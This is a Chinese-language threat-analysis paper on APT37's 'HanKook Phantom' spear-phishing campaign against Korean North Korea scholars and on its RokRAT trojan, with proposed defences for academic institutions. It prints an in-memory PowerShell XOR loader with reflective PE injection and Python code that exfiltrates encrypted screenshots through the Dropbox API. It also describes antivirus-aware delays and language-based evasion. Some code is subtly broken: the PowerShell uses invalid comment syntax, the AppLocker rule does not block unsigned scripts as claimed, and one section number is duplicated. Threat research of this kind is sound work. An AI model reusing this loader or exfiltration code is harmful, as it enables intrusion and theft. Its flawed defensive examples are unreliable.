摘要

近年来，国家级支持的高级持续性威胁（APT）组织逐渐将学术机构、智库以及政策研究团体纳入战略情报收集的重点范围。2025年9月，网络安全公司Seqrite披露了一起由与朝鲜关联的APT37组织（又名ScarCruft、Reaper、Group123）发起的新型鱼叉式钓鱼行动，代号“HanKook Phantom”。该行动专门针对韩国及国际范围内从事对朝政策研究的学者、前政府官员和相关研究机构成员。 攻击者通过伪造诸如“国家情报研究学会简报”或“朝韩关系政策草案”等具有高度可信度的文档作为诱饵，诱导目标用户运行嵌有恶意逻辑的LNK文件或压缩包，最终部署名为RokRAT的定制化远程访问木马。该木马具备屏幕截图、键盘记录、命令执行和敏感文件窃取能力，并借助Dropbox、Yandex Disk、pCloud等合法云存储服务进行隐蔽通信，有效规避传统网络边界检测机制。 本文基于公开技术报告与逆向工程分析，系统梳理此次攻击的投递路径、加载链路、持久化策略与数据外传方式，重点剖析其多层编码混淆、脚本宿主滥用（如wscript/mshta）、区域自适应行为控制以及反沙箱延迟执行等新特征。在此基础上，提出适用于资源受限软目标机构的四层纵深防御体系：强化端点脚本执行管控、实现应用层云流量可见性、建立高风险邮件预筛机制、推动威胁情报闭环共享。研究指出，尽管学术与政策研究机构不被视为传统意义上的关键基础设施，但其所掌握的地缘政治情报具备极高战略价值，亟需部署不低于企业级的安全防护基线。

关键词：

APT37；RokRAT；鱼叉式钓鱼；学术界安全；云隐蔽通信；脚本宿主滥用；威胁情报共享

1 引言

以国家行为体为核心的网络间谍活动长期聚焦于国防、外交及关键基础设施领域，但近年来其攻击边界已显著扩展至高校、独立智库及非政府政策研究组织。这类“软目标”虽普遍缺乏专业级网络安全防护能力，却往往持有尚未公开的政策研判成果、专家人际网络与地缘战略评估资料，成为国家级APT组织极具吸引力的情报来源。 2025年9月，Seqrite Labs曝光朝鲜背景的APT37组织对韩国学术圈发动新一轮定向攻击——“Operation HanKook Phantom”，标志着此类情报采集行动正迈向高度专业化与自动化的新阶段。自2012年起活跃的APT37，以往主要针对韩国政府机关、军工企业和主流媒体，曾利用Adobe Flash零日漏洞（CVE-2018-4878）实施大规模攻击。而在本次行动中，其战术发生明显演进：诱饵内容从通用政务通知转向深度定制的学术资料（如会议议程、政策草案），投递载体采用多层混淆的LNK文件与压缩包组合，最终载荷RokRAT则集成基于云API的通信机制与地理区域自适应的行为控制模块。 尤为值得注意的是，攻击者采取了低噪声操作策略，例如根据目标环境选择性延迟恶意行为触发时间，避免触发EDR系统的聚合告警机制，从而提升隐蔽性与驻留周期。本文旨在全面解析APT37此次攻击的技术细节，还原从初始投递到数据回传的完整杀伤链，并结合学术机构普遍存在资源有限、安全意识薄弱的现实困境，提出可落地实施的防御框架。全文结构安排如下：第二部分介绍攻击背景与目标画像；第三部分拆解投递与多阶段加载机制；第四部分深入分析RokRAT的功能特性与隐蔽通信手段；第五部分归纳本次攻击呈现的新特征；第六部分构建四层纵深防御体系并说明关键技术实现路径；第七部分探讨软目标安全范式的转变方向；第八部分总结核心观点。

2 攻击背景与目标画像

2.1 APT37组织概况

APT37（又称ScarCruft）被广泛认为隶属于朝鲜侦察总局（RGB），其网络活动呈现出强烈的政治导向性，主要服务于朝鲜半岛局势的情报搜集与对韩反制策略制定。历史攻击目标集中于韩国统一部、国防部、主流新闻媒体以及半导体产业实体。该组织的技术栈以Windows平台为核心，惯于混合使用自研后门程序（如RokRAT、Dtrack）与开源渗透工具（如PowerShell Empire）进行复合式攻击部署。

2.2 “HanKook Phantom”行动的目标特征

此次攻击明确锁定三类核心人群：

• 高校朝鲜/东亚研究学者：掌握未发表的半岛局势动态分析与内部研讨成果；
• 前政府政策官员：拥有过往决策流程信息与高层联络网络；
• 智库研究人员：参与政府委托的对朝战略项目，接触敏感政策建议。

攻击所用诱饵文档仿真程度极高。例如，“国家情报研究学会第52期简报”PDF文件包含真实会议时间、地点与专家名单，仅在附件中嵌入一个恶意LNK文件。另一典型诱饵为题为“金与正7月28日声明”的Word文档，巧妙利用朝韩关系热点事件提升收件人打开意愿，增强社会工程成功率。

3 投递与多阶段加载机制

3.1 初始投递：双路径载体设计

攻击者通过精准鱼叉邮件发送两种主要攻击载体：

• 伪装PDF + 恶意LNK文件：邮件正文声称附带“简报.pdf”，实际附件为名为newsletter.lnk的快捷方式文件；
• 压缩包内嵌恶意脚本：ZIP压缩包中包含一份正常的policy_draft.doc文档与一个名为setup.js的JavaScript恶意脚本。

其中，LNK文件利用Windows Shell机制直接调用PowerShell解释器，执行一段经过Base64编码的恶意载荷指令，实现无文件攻击路径。而ZIP包中的JS脚本则通过mshta或wscript宿主进程加载，进一步释放后续阶段组件，完成初始驻留。

3.2 多阶段加载链

执行流程说明：

第一阶段（LNK/JS）：
通过LNK文件触发PowerShell命令，从远程服务器下载经过加密的第二阶段加载器，该文件通常伪装为PNG图像；
若使用JS脚本，则借助WScript.Shell对象执行类似行为，实现初始载荷投递。

第二阶段（加载器）：
所下载的“PNG”实际为XOR加密后的PE格式恶意程序；
利用PowerShell在内存中完成解密与反射注入，避免落盘行为：
$bytes = [System.IO.File]::ReadAllBytes("decoy.png")
$key = @(0x41,0x42,0x43) // 使用固定XOR密钥
for($i=0; $i -lt $bytes.Length; $i++) {
  $bytes[$i] = $bytes[$i] -bxor $key[$i % $key.Length]
}
Invoke-ReflectivePEInjection -PEBytes $bytes

第三阶段（RokRAT主体）：
加载器将RokRAT核心模块释放至内存空间；
随后注入到explorer.exe或dllhost.exe等合法进程中，实现隐蔽驻留和持久化控制。

---

4 RokRAT功能与隐蔽通信

4.1 核心功能模块
该远控木马具备完整的间谍能力，主要包括：

• 屏幕截图：支持定时或按指令抓取当前桌面画面；
• 键盘记录：通过挂钩Windows API捕获用户按键信息；
• 文件窃取：自动遍历预设目录（如Documents\Research），上传敏感文档；
• 远程命令执行：接收C2服务器指令，执行任意系统命令。

4.2 借助云API的隐蔽数据外传
为绕过传统防火墙检测，RokRAT采用主流云存储服务接口进行数据回传，通信流量完全符合HTTPS规范，域名亦属常见白名单范围，难以被DPI识别。

具体实现方式包括：

• Dropbox：调用 /2/files/upload 接口上传加密文件；
• Yandex Disk：使用OAuth令牌访问 /v1/disk/resources/upload；
• pCloud：模拟浏览器User-Agent，向/uploadfile路径发送数据。

示例代码（Python模拟数据外泄过程）：

import requests
import base64

def exfil_to_dropbox(data, token):
    url = "https://content.dropboxapi.com/2/files/upload"
    headers = {
        "Authorization": f"Bearer {token}",
        "Dropbox-API-Arg": '{"path":"/screenshots/screen_001.png","mode":"add"}',
        "Content-Type": "application/octet-stream"
    }
    encrypted_data = xor_encrypt(data, b"SECRET_KEY")
    requests.post(url, headers=headers, data=encrypted_data)

---

5 攻击新特征分析

5.1 脚本宿主滥用与多层编码技术
攻击者综合运用Base64、XOR及Hex编码，并交替调用wscript.exe、mshta.exe、powershell.exe等系统可信进程，以规避AMSI和EDR监控。
例如：JS脚本通过 ActiveXObject("WScript.Shell") 间接启动PowerShell，从而绕开对直接调用的检测机制。

5.2 区域自适应的行为控制策略
在执行关键操作前，RokRAT会调用 GetUserDefaultLangID() 检测系统语言环境；
若发现非韩语或英语系统，则禁用高风险功能（如键盘记录），仅维持低噪声活动（如心跳包发送），降低被发现的可能性。

5.3 安全软件感知与执行延迟机制
木马运行时会枚举当前运行进程，一旦检测到 MsMpEng.exe（Windows Defender）、cb.exe（Carbon Black）等安全组件，
便会主动延迟10至30分钟再执行敏感操作，防止短时间内产生大量异常行为日志而被关联分析。

---

6 面向学术机构的四层防御对策

6.1 端点脚本执行管控
部署强制性AppLocker策略，仅允许经过数字签名的脚本运行；
以下为规则配置示例，用于阻止未签名的JS/VBS脚本：

<!-- AppLocker规则示例：阻止未签名JS/VBS -->
<FilePublisherRule Id="BlockUnsignedScripts" Action="Deny">
  <Conditions>
    <FilePublisherCondition PublisherName="*" ProductName="*">
      <BinaryVersionRange LowSection="*" HighSection="*" />
    </FilePublisherCondition>
  </Conditions>
</FilePublisherRule>

6.2 云环境应用层流量监控

为提升对云服务通信的可见性，建议部署SSL解密代理工具（例如Zscaler、Palo Alto），并结合数据防泄露（DLP）策略，实现对云API调用行为的深度监测。具体措施包括：

• 识别非浏览器进程对api.dropbox.com等关键接口的访问请求；
• 检测使用非常规User-Agent的行为，如Python-urllib/3.x等程序化上传标识；
• 对上传文件进行熵值分析，判断是否存在加密或压缩后的恶意载荷。

6.3 高风险邮件前置过滤机制

针对外部邮件中包含“协同写作”“政策草案”“会议邀请”等敏感关键词的情况，应启动自动化预筛流程：

• 自动移除所有附件，并替换为安全预览链接以防止直接执行；
• 对发件人域名实施严格的SPF、DKIM与DMARC验证机制；
• 集成实时威胁情报系统，比对附件哈希值与已知RokRAT相关IOC指标。

6.4 威胁情报协同响应体系

构建面向学术联盟的威胁情报共享平台，推动跨机构联防联动：

• 从新捕获样本中自动提取攻击者战术、技术与流程（TTP），如LNK文件中的命令行参数、C2域名等；
• 通过标准化STIX/TAXII格式将情报快速分发至成员单位；
• 与终端检测响应系统（EDR）联动，实现对已知IOC的秒级阻断能力。

6.1 端点层面防御强化：禁用LNK自动执行

通过组策略对象（GPO）修改注册表HKEY_CLASSES_ROOT\.lnk的默认操作设置，彻底禁用LNK文件的自动执行功能，降低社会工程类攻击的成功率。

7 学术类软目标的安全范式升级

传统认知中，学术机构常被视为“无密可守”的组织，但APT37的行动表明，其掌握的未公开政策研究、专家关系网络及地缘政治分析具备高度战略价值。然而，此类机构普遍面临三大安全挑战：

• 预算受限：难以负担企业级EDR/XDR解决方案的高昂成本；
• 设备多样化：大量个人笔记本电脑接入校园网络，带来管理盲区；
• 安全意识不足：研究人员注重开放协作，缺乏基本防护警觉。

因此，亟需推进“软目标企业级安全基线”建设，分级实施防护策略：

• 基础要求：强制启用多因素认证（MFA）、实施端点脚本运行管控、增强邮件网关过滤规则；
• 推荐配置：部署浏览器隔离技术、启用云流量DLP策略、订阅专业威胁情报源；
• 高级实践：定期开展红蓝对抗演练、建立数据分级访问控制机制。

8 总结与展望

APT37发起的“HanKook Phantom”行动暴露了国家级网络间谍活动的新动向：目标高度精准、诱饵专业化程度高、技术手段隐蔽性强。RokRAT利用云API通信、区域自适应行为以及多重混淆机制，成功绕过传统安全检测体系。

学术与政策研究机构不能再以“非关键设施”为由忽视自身风险，而应基于其所持有的情报资产价值重新评估威胁等级，并部署相匹配的安全防护基线。

本文提出的四层防御架构——涵盖端点控制、云流量监控、邮件预筛到威胁情报闭环共享——为资源有限的软目标单位提供了切实可行的安全实施路径。

后续研究将聚焦于RokRAT变种TTP的自动化提取方法，以及构建适用于学术场景的专属威胁狩猎模型。